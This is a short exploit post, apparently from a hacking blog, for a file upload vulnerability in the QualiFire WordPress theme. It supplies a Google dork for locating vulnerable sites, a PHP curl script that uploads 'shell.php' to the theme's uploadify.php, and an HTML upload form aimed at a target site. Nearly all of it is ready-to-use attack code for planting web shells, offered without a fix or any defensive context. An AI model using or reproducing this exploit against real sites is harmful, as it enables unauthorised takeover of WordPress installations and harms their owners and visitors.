Friday, January 20, 2017
Wordpress Themes QualiFire File Upload Vulnerability
Wordpress Themes QualiFire File Upload Vulnerability
#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================
-- Proof Of Concept --
Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
When Vuln : Blank
Remote file :
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(Filedata=>"@$uploadfile",
folder=>/wp-content/themes/qualifire/scripts/admin/uploadify/));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
Shell Path : Here
Available link for download
